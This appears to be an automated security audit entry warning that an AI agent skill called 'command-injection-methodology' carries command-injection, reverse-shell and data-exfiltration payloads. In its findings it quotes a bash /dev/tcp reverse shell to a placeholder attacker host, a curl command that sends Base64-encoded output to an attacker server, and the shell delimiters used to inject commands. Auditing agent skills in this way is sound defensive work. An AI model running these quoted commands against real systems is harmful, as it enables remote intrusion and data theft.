command-injection-methodology
Warn
Audited by Gen Agent Trust Hub on May 9, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONDATA_EXFILTRATIONREMOTE_CODE_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides numerous payloads for executing arbitrary OS commands by using various shell delimiters (
;,|,&&,%0a) and shell substitution techniques to bypass security filters. - [REMOTE_CODE_EXECUTION]: It contains explicit instructions and templates for establishing a reverse shell connection, specifically using the payload
bash -i >& /dev/tcp/ATTACKER/4444 0>&1to gain persistent interactive access. - [DATA_EXFILTRATION]: The methodology details how to exfiltrate sensitive information, such as flag files, to external attacker-controlled servers using network tools like
curlcombined with Base64 encoding (curl http://attacker/?d=$(cmd|base64)).
Audit Metadata